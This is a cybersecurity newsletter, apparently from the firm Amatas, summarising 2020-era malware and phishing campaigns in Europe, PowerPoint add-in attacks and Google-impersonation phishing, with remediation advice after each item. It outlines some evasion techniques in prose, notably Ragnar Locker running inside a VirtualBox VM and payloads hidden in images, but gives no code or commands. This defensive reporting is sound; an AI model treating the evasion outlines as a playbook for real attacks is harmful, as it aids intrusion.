Threat actors continue to evolve their tactics, techniques, and procedures to see their plans to fruition. Besides using white-listed service providers, recent cyberattacks have also witnessed the adoption of steganography, virtual machines, and PowerPoint add-ins to increase their chance of success.



This week’s newsletter will cover:

  • Attacks against individuals and companies in Europe
  • Attacks using Microsoft PowerPoint add-ins
  • Attacks impersonating Google


Attacks against individuals and companies in Europe

Next to Spain, Portugal has now experienced a series of phishing campaigns infecting the machines of unsuspecting users with the “Grandoreiro” banking trojan. The individuals’ names have been included in the file names of the malicious attachments to improve the click rate.  

A fresh ransomware strain known as “Unicorn” has leveraged the rollout of Italy’s official COVID-19 contact tracing app – “Immuni” – to distribute a beta version of a desktop application purporting to be from the Italian Pharmacist Federation.

A recent version of the “Valak” malware has been used against enterprises in Germany. According to security researchers, the primary goal has been to steal Microsoft Exchange server mailing information, passwords, and certificates.

A variant of the “Zeus” banking trojan has been distributed in Germany and Poland using Coronavirus-related lures and fake invoices.

Remediation: Educate employees on the risks of phishing.


The “Ragnar Locker” ransomware has been seen lately to deploy itself within a Windows XP SP3 virtual machine in a new approach to evade detection. The threat actors use a Group Policy task to execute a Microsoft Installer to download and silently install an unsigned package from a remote server. The package would (1) install an old version of Oracle VirtualBox, (2) store the virtualization software and the virtual disk image within the "C:\Program Files (x86)\VirtualAppliances" directory for legitimacy reasons, (3) deploy several files to disable Windows AutoPlay notifications, to delete volume shadow copies and to enumerate connected drives so that they can be accessed by the virtual machine. “Ragnar Locker” is executed with a batch file from the startup folder to maintain foothold after reboot.

Remediation: Use endpoint protection. Frequently back up critical information. Scan other environments for similar infections. Check for the availability of a decryption tool, verifying its origin before executing it as there have been cases of advertised malware removal software that has been intentionally infected. Avoid ransom payment and notify law enforcement.


Firms across Italy, Germany, and the United Kingdom supplying equipment and software for industrial organizations mainly in the energy sector have been targeted with stealthy credential stealing campaigns.

Besides the usual culprits such as nefarious macro-laden Microsoft office documents, obfuscated versions of the password-stealing tool Mimikatz, and PowerShell scripts, the attackers have used three interesting techniques to add a layer of sophistication to their campaigns.

  • First, the emails are written in the target’s language allowing the malicious activities to kick in after ensuring that the computer’s installed language pack matches the language of the phishing email.
  • Second, part of the code is hidden within images downloaded from popular image hosting services such as “imgur.com” or “imgbox.com”. According to security experts, the use of steganography and legitimate services make it practically impossible to detect the malware using network traffic monitoring tools during the download.
  • Last, researchers have spotted the use of an exception message as the decryption key for the payload to evade sandbox detection and to make the analysis much harder when the OS language used on the victim’s computer is not known.

Remediation: Assess supply chain risk. Educate employees on the risks of phishing emails.


Attacks using Microsoft PowerPoint add-ins

A security researcher has found the “Agent Tesla” keylogger and Remote Access Trojan deployed with the help of a PowerPoint third party “add-in” disguised as a Microsoft template in a classic phishing email. Unbeknownst to some, PowerPoint “add-ins” allow the execution of macro scripts which have historically been associated with malicious Excel and Word documents.

Remediation: Educate employees on the risks of phishing emails. Keep an eye on what browser add-ins are installed.


Attacks impersonating Google

Remote workers have been bombarded with tens of thousands of Google-branded cyberattacks in recent months. According to analysts, Google file sharing and storage websites (storage.googleapis.com, docs.google.com, storage.cloud.google.com, drive.google.com) have been adopted in far more credential harvesting campaigns (65%) than those impersonating Microsoft (onedrive.live.com, sway.office.com, forms.office.com) or other brands (ex. sendgrid.net, mailchimp.com, formcrafts.com).

Remediation: Educate employees on the risks of phishing emails.


As always – be vigilant, stay alert, think twice.

AMATAS will continue to monitor this space and deliver salient information regularly. Stay tuned for our next cyber report and if you are interested in any of our privacy and cybersecurity services, please do reach out through our website  www.amatas.com  or by e-mailing office@amatas.com.



Amatas, Cyware, The Hacker News, Kaspersky, Info Security, Barracuda Networks, Security Affairs, Threat Post, Agency for Digital Italy Computer Emergency Response Team, Twitter User @JAMESWT_MHT, Twitter User @dottormarc, Tripwire, SANS, Anomali, Proofpoint, Sophos, Google, Microsoft, Creative Commons